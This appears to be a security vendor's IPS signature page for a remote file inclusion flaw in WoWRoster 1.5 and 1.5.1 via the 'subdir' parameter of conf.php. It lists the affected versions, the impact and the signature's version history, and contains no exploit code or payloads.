WoW.Roster.subdir.Parameter.Handling.File.Inclusion

description-logoDescription

This indicates an attempt to exploit a PHP remote File Inclusion vulnerability in WoWRoster (aka World of Warcraft Roster).
The vulnerability in "conf.php" may allow remote attackers to execute arbitrary PHP code via a URL in the "subdir" parameter.

affected-products-logoAffected Products

WoW Roster WoW Roster 1.5.1
WoW Roster WoW Roster 1.5

Impact logoImpact

System Compromise: Arbitrary PHP code execution.

recomended-action-logoRecommended Actions

Currently we are not aware of any official vendor supplied patch for this issue.
WoWRoster Web site: http://www.wowroster.net/

Telemetry logoTelemetry

Coverage

IPS (Regular DB)
IPS (Extended DB)

Version Updates

Date Version Detail
2019-07-12 14.648 Sig Added